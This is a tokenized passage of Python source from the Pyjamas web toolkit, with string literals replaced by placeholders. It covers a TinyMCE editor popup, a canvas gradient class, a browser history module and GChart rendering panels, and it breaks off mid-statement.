"<STR_LIT>" ) <EOL> new_script . innerHTML = """<STR_LIT>""" <EOL> ih = """<STR_LIT>""" % self . editor_id <EOL> print new_script . innerHTML <EOL> DOM . setElemAttribute ( new_script , "<STR_LIT:type>" , "<STR_LIT>" ) <EOL> doc ( ) . body . appendChild ( new_script ) <EOL> def load ( self , token , fname , data ) : <EOL> left = <NUM_LIT:50> <EOL> top = <NUM_LIT:50> <EOL> self . setPopupPosition ( left , top ) <EOL> self . show ( ) <EOL> self . token = token <EOL> self . fname = fname <EOL> self . msg . setHTML ( "<STR_LIT>" % fname ) <EOL> self . txt . setText ( data ) <EOL> if not self . editor_created : <EOL> self . editor_created = True <EOL> if self . fname . endswith ( "<STR_LIT>" ) : <EOL> Timer ( <NUM_LIT> , notify = self . _load_tinymce ) <EOL> def _load_tinymce ( self , timer ) : <EOL> self . add_tinymce ( ) <EOL> def load_tinymce ( self ) : <EOL> new_script = DOM . createElement ( "<STR_LIT>" ) <EOL> new_script . innerHTML = """<STR_LIT>""" % self . editor_id <EOL> print new_script . innerHTML <EOL> DOM . setElemAttribute ( new_script , "<STR_LIT:type>" , "<STR_LIT>" ) <EOL> doc ( ) . body . appendChild ( new_script ) <EOL> def transfer_tinymce ( self ) : <EOL> new_script = DOM . createElement ( "<STR_LIT>" ) <EOL> new_script . innerHTML = """<STR_LIT>""" % ( self . editor_id , self . editor_id ) <EOL> self . editor_created = False <EOL> DOM . setElemAttribute ( new_script , "<STR_LIT:type>" , "<STR_LIT>" ) <EOL> doc ( ) . body . appendChild ( new_script ) <EOL> self . hide ( ) <EOL> t = Timer ( notify = self ) <EOL> t . scheduleRepeating ( <NUM_LIT:1000> ) <EOL> def onTimer ( self , timer ) : <EOL> iframe = doc ( ) . getElementById ( "<STR_LIT>" % self . editor_id ) <EOL> print dir ( iframe ) <EOL> txt = iframe . innerText <EOL> if not txt : <EOL> return <EOL> timer . cancel ( ) <EOL> doc ( ) . body . removeChild ( iframe ) <EOL> self . app . save_page ( self . token , self . fname , txt ) <EOL> def onClick ( self , sender ) : <EOL> if sender == self . saveButton : <EOL> if self . fname . endswith ( "<STR_LIT>" ) : <EOL> self . transfer_tinymce ( ) <EOL> else : <EOL> txt = self . txt . getText ( ) <EOL> self . app . save_page ( self . token , self . fname , txt ) <EOL> self . hide ( ) <EOL> else : <EOL> self . hide ( ) </s>
<s> """<STR_LIT>""" <EOL> from pyjamas . Canvas . CanvasGradientImplDefault import CanvasGradientImplDefault <EOL> """<STR_LIT>""" <EOL> class RadialGradientImplDefault ( CanvasGradientImplDefault ) : <EOL> def __init__ ( self , x0 , y0 , r0 , x1 , y1 , r1 , c ) : <EOL> CanvasGradientImplDefault . __init__ ( self ) <EOL> self . createNativeGradientObject ( x0 , y0 , r0 , x1 , y1 , r1 , c ) <EOL> def createNativeGradientObject ( self , x0 , y0 , r0 , x1 , y1 , r1 , c ) : <EOL> ctx = c . getContext ( '<STR_LIT>' ) <EOL> gradient = ctx . createRadialGradient ( x0 , y0 , r0 , x1 , y1 , r1 ) <EOL> self . setNativeGradient ( gradient ) </s>
<s> from __pyjamas__ import JS , doc , wnd <EOL> import pyjd <EOL> if pyjd . is_desktop : <EOL> from __pyjamas__ import get_main_frame <EOL> global historyToken <EOL> historyToken = '<STR_LIT>' <EOL> historyListeners = [ ] <EOL> """<STR_LIT>""" <EOL> def addHistoryListener ( listener ) : <EOL> print "<STR_LIT>" , listener <EOL> historyListeners . append ( listener ) <EOL> def back ( ) : <EOL> wnd ( ) . history . back ( ) <EOL> def forward ( ) : <EOL> wnd ( ) . history . forward ( ) <EOL> def getToken ( ) : <EOL> global historyToken <EOL> return historyToken <EOL> def newItem ( ht ) : <EOL> global historyToken <EOL> if historyToken == ht : <EOL> return <EOL> onHistoryChanged ( ht ) <EOL> return <EOL> JS ( """<STR_LIT>""" ) <EOL> def onHistoryChanged ( ht ) : <EOL> fireHistoryChangedImpl ( ht ) <EOL> def fireHistoryChangedAndCatch ( ) : <EOL> pass <EOL> def fireHistoryChangedImpl ( ht ) : <EOL> global historyToken <EOL> if historyToken == ht : <EOL> return <EOL> historyToken = ht <EOL> for listener in historyListeners : <EOL> listener . onHistoryChanged ( ht ) <EOL> def removeHistoryListener ( listener ) : <EOL> historyListeners . remove ( listener ) <EOL> def _first_notify ( ) : <EOL> print "<STR_LIT>" , historyToken <EOL> onHistoryChanged ( historyToken ) <EOL> def init ( ) : <EOL> print "<STR_LIT>" , get_main_frame ( ) , pyjd . is_desktop <EOL> if get_main_frame ( ) is None : <EOL> if pyjd . is_desktop : <EOL> pyjd . add_setup_callback ( init ) <EOL> return <EOL> global historyToken <EOL> historyToken = '<STR_LIT>' <EOL> hash = wnd ( ) . location . hash <EOL> if hash and len ( hash ) > <NUM_LIT:0> : <EOL> historyToken = hash [ <NUM_LIT:1> : ] <EOL> init ( ) </s>
<s> """<STR_LIT>""" <EOL> import math <EOL> from pyjamas import DOM <EOL> from pyjamas import Window <EOL> from pyjamas . ui import Event <EOL> from pyjamas . ui . AbsolutePanel import AbsolutePanel <EOL> from pyjamas . ui . Composite import Composite <EOL> from pyjamas . ui . Grid import Grid <EOL> from pyjamas . ui import HasHorizontalAlignment <EOL> from pyjamas . ui import HasVerticalAlignment <EOL> from pyjamas . ui . HTML import HTML <EOL> from pyjamas . ui . Image import Image <EOL> from pyjamas . ui . SimplePanel import SimplePanel <EOL> from pyjamas . ui . UIObject import UIObject <EOL> from pyjamas . ui . Widget import Widget <EOL> from pyjamas . chart . GChartConsts import N_PRE_SYSTEM_CURVES <EOL> from pyjamas . chart . GChartConsts import TRANSPARENT_BORDER_COLOR <EOL> from pyjamas . chart . GChartConsts import HOVER_ANNOTATION_ID <EOL> from pyjamas . chart . GChartConsts import HOVER_CURSOR_ID <EOL> from pyjamas . chart . GChartConsts import USE_CSS <EOL> from pyjamas . chart . GChartConsts import NAI <EOL> from pyjamas . chart . GChartConsts import DEFAULT_BLANK_IMAGE_URL_FULLPATH <EOL> from pyjamas . chart import GChartUtil <EOL> from pyjamas . chart import Double <EOL> """<STR_LIT>""" <EOL> WIDGETS_PER_PANEL = <NUM_LIT> <EOL> class PartitionedAbsolutePanel ( Composite ) : <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> self . root = AbsolutePanel ( ) <EOL> self . subPanel = None <EOL> self . iSubPanel = - <NUM_LIT:1> <EOL> self . nWidgets = <NUM_LIT:0> ; <EOL> Composite . __init__ ( self , ** kwargs ) <EOL> self . initWidget ( self . root ) <EOL> """<STR_LIT>""" <EOL> def clear ( self ) : <EOL> self . root . clear ( ) <EOL> self . subPanel = None <EOL> self . iSubPanel = - <NUM_LIT:1> <EOL> self . nWidgets = <NUM_LIT:0> <EOL> def getWidgetCount ( self ) : <EOL> return self . nWidgets <EOL> def selectSubPanel ( self , iWidget ) : <EOL> if self . iSubPanel != int ( iWidget / WIDGETS_PER_PANEL ) : <EOL> self . iSubPanel = int ( iWidget / WIDGETS_PER_PANEL ) <EOL> self . subPanel = self . root . getWidget ( self . iSubPanel ) <EOL> def add ( self , w ) : <EOL> if ( self . nWidgets % WIDGETS_PER_PANEL ) == <NUM_LIT:0> : <EOL> self . subPanel = AbsolutePanel ( ) <EOL> GChartUtil . setOverflow ( self . subPanel , "<STR_LIT>" ) <EOL> self . subPanel . setPixelSize ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . root . add ( self . subPanel , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . selectSubPanel ( self . nWidgets ) <EOL> self . subPanel . add ( w ) <EOL> self . nWidgets += <NUM_LIT:1> <EOL> def getWidget ( self , iWidget ) : <EOL> if iWidget < <NUM_LIT:0> or iWidget >= self . nWidgets : <EOL> raise IndexError ( <EOL> "<STR_LIT>" + str ( iWidget ) + <EOL> "<STR_LIT>" + str ( ( self . nWidgets - <NUM_LIT:1> ) ) ) <EOL> self . selectSubPanel ( iWidget ) <EOL> result = self . subPanel . getWidget ( iWidget % WIDGETS_PER_PANEL ) <EOL> return result <EOL> def remove ( self , iWidget ) : <EOL> if iWidget != self . nWidgets - <NUM_LIT:1> : <EOL> raise IllegalArgumentException ( <EOL> "<STR_LIT>" + iWidget + "<STR_LIT>" + ( self . nWidgets - <NUM_LIT:1> ) + "<STR_LIT>" ) <EOL> self . selectSubPanel ( iWidget ) <EOL> result = self . subPanel . remove ( iWidget % WIDGETS_PER_PANEL ) <EOL> if ( iWidget % WIDGETS_PER_PANEL ) == <NUM_LIT:0> : <EOL> self . root . remove ( self . subPanel ) <EOL> self . iSubPanel = - <NUM_LIT:1> <EOL> self . subPanel = None <EOL> self . nWidgets -= <NUM_LIT:1> <EOL> return result <EOL> def setWidgetPosition ( self , w , left , top ) : <EOL> self . subPanel . setWidgetPosition ( w , left , top ) <EOL> class AlignedLabel ( Grid ) : <EOL> def __init__ ( self , ** kwargs ) : <EOL> Grid . __init__ ( self , <NUM_LIT:1> , <NUM_LIT:1> , ** kwargs ) <EOL> self . getCellFormatter ( ) . setWordWrap ( <NUM_LIT:0> , <NUM_LIT:0> , False ) <EOL> self . setCellPadding ( <NUM_LIT:0> ) <EOL> self . setCellSpacing ( <NUM_LIT:0> ) <EOL> self . setBorderWidth ( <NUM_LIT:0> ) <EOL> class Rectangle ( object ) : <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . x , self . y , self . width , self . height ) <EOL> """<STR_LIT>""" <EOL> class NonoccludingReusuableAlignedLabel ( AlignedLabel ) : <EOL> def getInnerGrid ( self ) : <EOL> return self . innerGrid <EOL> def __init__ ( self ) : <EOL> self . fontSize = NAI <EOL> self . fontStyle = USE_CSS <EOL> self . fontWeight = USE_CSS <EOL> self . fontColor = USE_CSS <EOL> self . labelText = None <EOL> self . isHTML = False <EOL> self . labelWidget = None <EOL> self . innerGrid = AlignedLabel ( ) <EOL> self . hAlign = None <EOL> self . vAlign = None <EOL> AlignedLabel . __init__ ( self ) <EOL> self . setWidget ( <NUM_LIT:0> , <NUM_LIT:0> , self . innerGrid ) <EOL> """<STR_LIT>""" <EOL> DOM . setStyleAttribute ( self . getElement ( ) , "<STR_LIT>" , "<STR_LIT>" ) <EOL> DOM . setStyleAttribute ( self . innerGrid . getElement ( ) , <EOL> "<STR_LIT>" , "<STR_LIT>" ) <EOL> """<STR_LIT>""" <EOL> def setReusableProperties ( self , fontSize , fontStyle , fontWeight , fontColor , <EOL> hAlign , vAlign , labelText , <EOL> isHTML , labelWidget ) : <EOL> if self . fontSize != fontSize : <EOL> DOM . setIntStyleAttribute ( self . innerGrid . getElement ( ) , "<STR_LIT>" , fontSize ) <EOL> self . fontSize = fontSize <EOL> if self . fontStyle != fontStyle : <EOL> DOM . setStyleAttribute ( self . innerGrid . getElement ( ) , "<STR_LIT>" , fontStyle ) <EOL> self . fontStyle = fontStyle <EOL> if self . fontWeight != fontWeight : <EOL> DOM . setStyleAttribute ( self . innerGrid . getElement ( ) , "<STR_LIT>" , fontWeight ) <EOL> self . fontWeight = fontWeight <EOL> if self . fontColor != fontColor : <EOL> DOM . setStyleAttribute ( self . innerGrid . getElement ( ) , "<STR_LIT>" , fontColor ) <EOL> self . fontColor = fontColor <EOL> if self . hAlign != hAlign : <EOL> self . getCellFormatter ( ) . setHorizontalAlignment ( <NUM_LIT:0> , <NUM_LIT:0> , hAlign ) <EOL> self . innerGrid . getCellFormatter ( ) . setHorizontalAlignment ( <NUM_LIT:0> , <NUM_LIT:0> , hAlign ) <EOL> self . hAlign = hAlign <EOL> if self . vAlign != vAlign : <EOL> self . getCellFormatter ( ) . setVerticalAlignment ( <NUM_LIT:0> , <NUM_LIT:0> , vAlign ) <EOL> self . innerGrid . getCellFormatter ( ) . setVerticalAlignment ( <NUM_LIT:0> , <NUM_LIT:0> , vAlign ) <EOL> self . vAlign = vAlign <EOL> if None != labelWidget : <EOL> if self . labelWidget != labelWidget : <EOL> self . innerGrid . setWidget ( <NUM_LIT:0> , <NUM_LIT:0> , labelWidget ) <EOL> self . labelWidget = labelWidget <EOL> self . labelText = None <EOL> elif self . labelText != labelText or self . isHTML != isHTML : <EOL> if None == labelText or "<STR_LIT>" == labelText : <EOL> self . innerGrid . setText ( <NUM_LIT:0> , <NUM_LIT:0> , "<STR_LIT>" ) <EOL> elif not isHTML : <EOL> self . innerGrid . setText ( <NUM_LIT:0> , <NUM_LIT:0> , labelText ) <EOL> else : <EOL> self . innerGrid . setHTML ( <NUM_LIT:0> , <NUM_LIT:0> , labelText ) <EOL> self . isHTML = isHTML <EOL> self . labelText = labelText <EOL> self . labelWidget = None <EOL> """<STR_LIT>""" <EOL> class AnnotationRenderingPanel ( PartitionedAbsolutePanel ) : <EOL> """<STR_LIT>""" <EOL> def getFirstInnerAlignedLabel ( self ) : <EOL> result = None <EOL> if self . labelIndex > <NUM_LIT:0> : <EOL> parent = self . getWidget ( <NUM_LIT:0> ) <EOL> result = parent . getInnerGrid ( ) <EOL> return result <EOL> def __init__ ( self , chart ) : <EOL> self . chart = chart <EOL> self . labelIndex = <NUM_LIT:0> ; <EOL> self . lastVisibleLabel = - <NUM_LIT:1> ; <EOL> PartitionedAbsolutePanel . __init__ ( self ) <EOL> """<STR_LIT>""" <EOL> GChartUtil . setOverflow ( self , "<STR_LIT>" ) <EOL> self . setPixelSize ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> def setLabelPosition ( self , lbl , x , y ) : <EOL> if x == - <NUM_LIT:1> and y == - <NUM_LIT:1> : <EOL> x = <NUM_LIT:0> <EOL> self . setWidgetPosition ( lbl , x , y ) <EOL> def beginRendering ( self ) : <EOL> self . labelIndex = <NUM_LIT:0> <EOL> def endRendering ( self ) : <EOL> if self . chart . optimizeForMemory : <EOL> iLabel = ( self . getWidgetCount ( ) - <NUM_LIT:1> ) <EOL> else : <EOL> iLabel = self . lastVisibleLabel <EOL> while iLabel >= self . labelIndex : <EOL> w = self . getWidget ( iLabel ) <EOL> if self . chart . optimizeForMemory : <EOL> self . remove ( iLabel ) <EOL> else : <EOL> w . setVisible ( False ) <EOL> iLabel -= <NUM_LIT:1> <EOL> self . lastVisibleLabel = self . labelIndex - <NUM_LIT:1> <EOL> """<STR_LIT>""" <EOL> def getNextOrNewAlignedLabel ( self , fontSize , fontStyle , fontWeight , fontColor , hAlign , vAlign , labelText , isHTML , labelWidget ) : <EOL> if self . labelIndex < self . getWidgetCount ( ) : <EOL> result = self . getWidget ( self . labelIndex ) <EOL> if None != result . labelWidget and labelWidget == result . labelWidget : <EOL> """<STR_LIT>""" <EOL> e = labelWidget . getElement ( ) <EOL> if ( None == e or <EOL> ( DOM . getParent ( e ) != <EOL> result . innerGrid . getCellFormatter ( ) . getElement ( <NUM_LIT:0> , <NUM_LIT:0> ) ) ) : <EOL> result . labelWidget = None <EOL> if self . labelIndex > self . lastVisibleLabel : <EOL> result . setVisible ( True ) <EOL> else : <EOL> result = NonoccludingReusuableAlignedLabel ( ) <EOL> self . add ( result ) <EOL> result . setReusableProperties ( fontSize , fontStyle , fontWeight , <EOL> fontColor , hAlign , vAlign , <EOL> labelText , isHTML , labelWidget ) <EOL> if self . lastVisibleLabel < self . labelIndex : <EOL> self . lastVisibleLabel = self . labelIndex <EOL> self . labelIndex += <NUM_LIT:1> <EOL> return result <EOL> def renderAnnotation ( self , annotation , loc , xCenter , yCenter , symWidth , symHeight , symbol ) : <EOL> widthUpperBound = annotation . getWidthUpperBound ( ) <EOL> upLeftX = loc . getUpperLeftX ( xCenter , widthUpperBound , abs ( symWidth ) ) <EOL> heightUpperBound = annotation . getHeightUpperBound ( ) <EOL> upLeftY = loc . getUpperLeftY ( yCenter , heightUpperBound , abs ( symHeight ) ) <EOL> alignedLabel = self . getNextOrNewAlignedLabel ( <EOL> annotation . getFontSize ( ) , <EOL> annotation . getFontStyle ( ) , <EOL> annotation . getFontWeight ( ) , <EOL> annotation . getFontColor ( ) , <EOL> loc . getHorizontalAlignment ( ) , <EOL> loc . getVerticalAlignment ( ) , <EOL> annotation . getText ( ) , annotation . isHTML ( ) , <EOL> annotation . getWidget ( ) ) <EOL> if loc . getHorizontalAlignment ( ) != HasHorizontalAlignment . ALIGN_LEFT : <EOL> alignedLabel . setWidth ( str ( widthUpperBound ) + "<STR_LIT>" ) <EOL> else : <EOL> alignedLabel . setWidth ( "<STR_LIT>" ) <EOL> if loc . getVerticalAlignment ( ) != HasVerticalAlignment . ALIGN_TOP : <EOL> alignedLabel . setHeight ( str ( heightUpperBound ) + "<STR_LIT>" ) <EOL> else : <EOL> alignedLabel . setHeight ( "<STR_LIT>" ) <EOL> self . setLabelPosition ( alignedLabel , upLeftX , upLeftY ) <EOL> """<STR_LIT>""" <EOL> class ReusableImage ( Image ) : <EOL> def __init__ ( self , parent ) : <EOL> self . _parent = parent <EOL> self . backgroundColor = USE_CSS <EOL> self . borderColor = USE_CSS <EOL> self . borderStyle = USE_CSS <EOL> self . cappedBorderWidthX2 = NAI <EOL> self . width = NAI <EOL> self . height = NAI <EOL> self . x = NAI <EOL> self . y = NAI <EOL> self . url = None <EOL> Image . __init__ ( self ) <EOL> def setReusableProperties ( self , backgroundColor , borderColor , borderStyle , borderWidth , dWidth , dHeight , xD , yD , url ) : <EOL> newX = int ( round ( xD ) ) <EOL> newW = int ( round ( xD + dWidth ) - newX ) <EOL> newY = int ( round ( yD ) ) <EOL> newH = int ( round ( yD + dHeight ) - newY ) <EOL> thickness = min ( newW , newH ) <EOL> newCappedBorderWidthX2 = min ( <NUM_LIT:2> * borderWidth , thickness ) <EOL> """<STR_LIT>""" <EOL> if TRANSPARENT_BORDER_COLOR == borderColor : <EOL> if newCappedBorderWidthX2 > <NUM_LIT:0> : <EOL> newX += newCappedBorderWidthX2 / <NUM_LIT:2> ; <EOL> newY += newCappedBorderWidthX2 / <NUM_LIT:2> <EOL> newH -= newCappedBorderWidthX2 ; <EOL> newW -= newCappedBorderWidthX2 <EOL> newCappedBorderWidthX2 = <NUM_LIT:0> <EOL> borderColor = "<STR_LIT>" ; <EOL> if backgroundColor == TRANSPARENT_BORDER_COLOR : <EOL> backgroundColor = "<STR_LIT>" <EOL> elif newCappedBorderWidthX2 < <NUM_LIT:0> : <EOL> newX += newCappedBorderWidthX2 / <NUM_LIT:2> ; <EOL> newY += newCappedBorderWidthX2 / <NUM_LIT:2> ; <EOL> else : <EOL> newH -= newCappedBorderWidthX2 ; <EOL> newW -= newCappedBorderWidthX2 ; <EOL> if self . cappedBorderWidthX2 != newCappedBorderWidthX2 : <EOL> if <NUM_LIT:1> == ( newCappedBorderWidthX2 % <NUM_LIT:2> ) : <EOL> floorBW = int ( newCappedBorderWidthX2 / <NUM_LIT:2> ) <EOL> ceilBW = floorBW + <NUM_LIT:1> <EOL> DOM . setStyleAttribute ( self . getElement ( ) , <EOL> "<STR_LIT>" , <EOL> str ( floorBW ) + "<STR_LIT>" + str ( floorBW ) + "<STR_LIT>" + <EOL> str ( ceilBW ) + "<STR_LIT>" + str ( ceilBW ) + "<STR_LIT>" ) <EOL> else : <EOL> DOM . setStyleAttribute ( self . getElement ( ) , <EOL> "<STR_LIT>" , str ( abs ( newCappedBorderWidthX2 / <NUM_LIT:2> ) ) + "<STR_LIT>" ) <EOL> self . cappedBorderWidthX2 = newCappedBorderWidthX2 <EOL> if NAI == self . x : <EOL> self . _parent . setImagePosition ( self , newX , newY ) <EOL> self . x = newX <EOL> self . y = newY <EOL> else : <EOL> if self . x != newX : <EOL> DOM . setStyleAttribute ( self . getElement ( ) , "<STR_LIT:left>" , str ( newX ) + "<STR_LIT>" ) <EOL> self . x = newX <EOL> if self . y != newY : <EOL> DOM . setStyleAttribute ( self . getElement ( ) , "<STR_LIT>" , str ( newY ) + "<STR_LIT>" ) <EOL> self . y = newY <EOL> if self . width != newW : <EOL> self . setWidth ( str ( newW ) + "<STR_LIT>" ) <EOL> self . width = newW <EOL> if self . height != newH : <EOL> self . setHeight ( str ( newH ) + "<STR_LIT>" ) <EOL> self . height = newH <EOL> if self . backgroundColor != backgroundColor : <EOL> DOM . setStyleAttribute ( self . getElement ( ) , "<STR_LIT>" , <EOL> backgroundColor ) <EOL> self . backgroundColor = backgroundColor <EOL> if self . borderColor != borderColor : <EOL> DOM . setStyleAttribute ( self . getElement ( ) , "<STR_LIT>" , borderColor ) <EOL> self . borderColor = borderColor <EOL> if self . borderStyle != borderStyle : <EOL> DOM . setStyleAttribute ( self . getElement ( ) , "<STR_LIT>" , borderStyle ) <EOL> self . borderStyle = borderStyle <EOL> if self . url != url : <EOL> """<STR_LIT>""" <EOL> self . setUrl ( url ) <EOL> self . url = url <EOL> """<STR_LIT>""" <EOL> class GraphicsRenderingPanel ( AbsolutePanel ) : <EOL> def maybeAddCanvas ( self ) : <EOL> canvasFactory = self . chart . getCanvasFactory ( ) <EOL> if None != canvasFactory and None == self . canvas : <EOL> self . canvas = canvasFactory . create ( ) <EOL> if None != self . canvas : <EOL> if isinstance ( self . canvas , Widget ) : <EOL> """<STR_LIT>""" <EOL> DOM . setElemAttribute ( self . canvas . getElement ( ) , <EOL> "<STR_LIT>" , "<STR_LIT:left>" ) <EOL> self . canvasPanel . add ( self . canvas , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> else : <EOL> raise IllegalStateException ( <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> def __init__ ( self , chart , ** kwargs ) : <EOL> self . chart = chart <EOL> self . canvas = None <EOL> self . x0 = <NUM_LIT:0> ; <EOL> self . y0 = <NUM_LIT:0> ; <EOL> self . canvasWidth = <NUM_LIT:0> ; <EOL> self . canvasHeight = <NUM_LIT:0> ; <EOL> self . canvasPanel = AbsolutePanel ( ) <EOL> self . imagePanel = PartitionedAbsolutePanel ( ) <EOL> self . imageIndex = <NUM_LIT:0> <EOL> self . lastVisibleImage = - <NUM_LIT:1> <EOL> AbsolutePanel . __init__ ( self , ** kwargs ) <EOL> GChartUtil . setOverflow ( self . canvasPanel , "<STR_LIT>" ) <EOL> GChartUtil . setOverflow ( self . imagePanel , "<STR_LIT>" ) <EOL> self . canvasPanel . setPixelSize ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . imagePanel . setPixelSize ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . add ( self . canvasPanel , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . add ( self . imagePanel , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> def getCanvas ( self ) : <EOL> return self . canvas <EOL> def setImagePosition ( self , img , x , y ) : <EOL> if x == - <NUM_LIT:1> and y == - <NUM_LIT:1> : <EOL> x = <NUM_LIT:0> <EOL> self . imagePanel . setWidgetPosition ( img , x , y ) <EOL> def beginRendering ( self , canvasRegion ) : <EOL> if None != self . canvas : <EOL> if None == canvasRegion : <EOL> self . canvas . resize ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . canvasWidth = self . canvasHeight = <NUM_LIT:0> <EOL> else : <EOL> width = int ( round ( canvasRegion . width ) ) <EOL> height = int ( round ( canvasRegion . height ) ) <EOL> if width == self . canvasWidth and height == self . canvasHeight : <EOL> self . canvas . clear ( ) ; <EOL> else : <EOL> self . canvas . resize ( width , height ) <EOL> self . canvasWidth = width <EOL> self . canvasHeight = height <EOL> self . x0 = int ( round ( canvasRegion . x ) ) <EOL> self . y0 = int ( round ( canvasRegion . y ) ) <EOL> if self . x0 == - <NUM_LIT:1> and self . y0 == - <NUM_LIT:1> : <EOL> self . x0 = <NUM_LIT:0> <EOL> self . canvasPanel . setWidgetPosition ( self . canvas , self . x0 , self . y0 ) <EOL> self . imageIndex = <NUM_LIT:0> <EOL> def endRendering ( self ) : <EOL> if self . chart . optimizeForMemory : <EOL> iImage = ( self . imagePanel . getWidgetCount ( ) - <NUM_LIT:1> ) <EOL> else : <EOL> iImage = self . lastVisibleImage <EOL> while iImage >= self . imageIndex : <EOL> w = self . imagePanel . getWidget ( iImage ) <EOL> if self . chart . optimizeForMemory : <EOL> self . imagePanel . remove ( iImage ) <EOL> else : <EOL> DOM . setStyleAttribute ( w . getElement ( ) , "<STR_LIT>" , "<STR_LIT>" ) <EOL> iImage -= <NUM_LIT:1> <EOL> self . lastVisibleImage = self . imageIndex - <NUM_LIT:1> <EOL> """<STR_LIT>""" <EOL> def addOrRevealImage ( self , backgroundColor , borderColor , borderStyle , borderWidth , width , height , x , y , url ) : <EOL> if self . imageIndex < self . imagePanel . getWidgetCount ( ) : <EOL> img = self . imagePanel . getWidget ( self . imageIndex ) <EOL> if self . imageIndex > self . lastVisibleImage : <EOL> DOM . setStyleAttribute ( img . getElement ( ) , "<STR_LIT>" , "<STR_LIT>" ) <EOL> else : <EOL> img = ReusableImage ( self ) <EOL> self . imagePanel . add ( img ) <EOL> img . setReusableProperties ( backgroundColor , <EOL> borderColor , <EOL> borderStyle , <EOL> borderWidth , <EOL> width , <EOL> height , <EOL> x , y , url ) <EOL> if self . lastVisibleImage < self . imageIndex : <EOL> self . lastVisibleImage = self . imageIndex <EOL> self . imageIndex += <NUM_LIT:1> <EOL> def renderBorderedImage ( self , backgroundColor , borderColor , borderStyle , borderWidth , width , height , x , y , url ) : <EOL> self . addOrRevealImage ( backgroundColor , <EOL> borderColor , <EOL> borderStyle , <EOL> borderWidth , <EOL> width , <EOL> height , <EOL> x , y , url ) <EOL> DECORATIVE_RENDERING_PANEL_INDEX = <NUM_LIT:0> <EOL> class PlotPanel ( AbsolutePanel ) : <EOL> def __init__ ( self , chart , ** kwargs ) : <EOL> self . chart = chart <EOL> self . touchedPoint = None <EOL> self . touchedHoverWidget = None <EOL> self . insideHoverUpdate = False <EOL> self . insideHoverCleanup = False <EOL> self . xMax = Double . NaN <EOL> self . xMin = Double . NaN <EOL> self . y2Max = Double . NaN <EOL> self . y2Min = Double . NaN <EOL> self . yMax = Double . NaN <EOL> self . yMin = Double . NaN <EOL> self . clientX = NAI <EOL> self . clientY = NAI <EOL> self . xMouse = NAI <EOL> self . yMouse = NAI <EOL> self . graphicsPanel = AbsolutePanel ( ) <EOL> self . annotationPanel = AbsolutePanel ( ) <EOL> AbsolutePanel . __init__ ( self , ** kwargs ) <EOL> GChartUtil . setOverflow ( self , "<STR_LIT>" ) <EOL> GChartUtil . setOverflow ( self . graphicsPanel , "<STR_LIT>" ) <EOL> GChartUtil . setOverflow ( self . annotationPanel , "<STR_LIT>" ) <EOL> self . graphicsPanel . setPixelSize ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . annotationPanel . setPixelSize ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . add ( self . graphicsPanel , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . add ( self . annotationPanel , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . sinkEvents ( Event . ONMOUSEMOVE | Event . ONMOUSEOUT | <EOL> Event . ONCLICK | Event . ONMOUSEOVER ) <EOL> """<STR_LIT>""" <EOL> def addGraphicsRenderingPanel ( self , rpIndex ) : <EOL> domInsert = True <EOL> w = GraphicsRenderingPanel ( self . chart ) <EOL> if ( DECORATIVE_RENDERING_PANEL_INDEX == rpIndex or <EOL> self . chart . isHoverFeedbackRenderingPanel ( rpIndex ) or <EOL> not self . chart . getClipToPlotArea ( ) ) : <EOL> w . setPixelSize ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> GChartUtil . setOverflow ( w , "<STR_LIT>" ) <EOL> else : <EOL> w . setPixelSize ( self . getXChartSize ( ) , self . getYChartSize ( ) ) <EOL> GChartUtil . setOverflow ( w , "<STR_LIT>" ) <EOL> self . graphicsPanel . insert ( w , self . graphicsPanel . getElement ( ) , rpIndex ) <EOL> self . graphicsPanel . setWidgetPosition ( w , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> """<STR_LIT>""" <EOL> def addAnnotationRenderingPanel ( self , rpIndex ) : <EOL> domInsert = True <EOL> w = AnnotationRenderingPanel ( self . chart ) <EOL> self . annotationPanel . insert ( w , self . annotationPanel . getElement ( ) , <EOL> rpIndex ) <EOL> self . annotationPanel . setWidgetPosition ( w , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> """<STR_LIT>""" <EOL> def removeGraphicsRenderingPanel ( self , rpIndex ) : <EOL> self . graphicsPanel . remove ( rpIndex ) <EOL> def removeAnnotationRenderingPanel ( self , rpIndex ) : <EOL> self . annotationPanel . remove ( rpIndex ) <EOL> """<STR_LIT>""" <EOL> def getGraphicsRenderingPanel ( self , rpIndex ) : <EOL> if <NUM_LIT:0> == self . graphicsPanel . getWidgetCount ( ) : <EOL> for i in range ( N_PRE_SYSTEM_CURVES - <NUM_LIT:1> , len ( self . chart . curves ) ) : <EOL> rpInd = self . chart . getRenderingPanelIndex ( i ) <EOL> self . addGraphicsRenderingPanel ( rpInd ) <EOL> return self . graphicsPanel . getWidget ( rpIndex ) <EOL> def getAnnotationRenderingPanel ( self , rpIndex ) : <EOL> if <NUM_LIT:0> == self . annotationPanel . getWidgetCount ( ) : <EOL> for i in range ( N_PRE_SYSTEM_CURVES - <NUM_LIT:1> , len ( self . chart . curves ) ) : <EOL> rpInd = self . chart . getRenderingPanelIndex ( i ) <EOL> self . addAnnotationRenderingPanel ( rpInd ) <EOL> return self . annotationPanel . getWidget ( rpIndex ) <EOL> def getClientX ( self ) : <EOL> return self . clientX <EOL> def setClientX ( self , clientX , isClick ) : <EOL> """<STR_LIT>""" <EOL> if clientX <= <NUM_LIT:0> and isClick : <EOL> return <EOL> elif clientX < <NUM_LIT:0> : <EOL> clientX = NAI <EOL> self . clientX = clientX <EOL> if ( NAI == clientX ) : <EOL> self . xMouse = NAI <EOL> else : <EOL> self 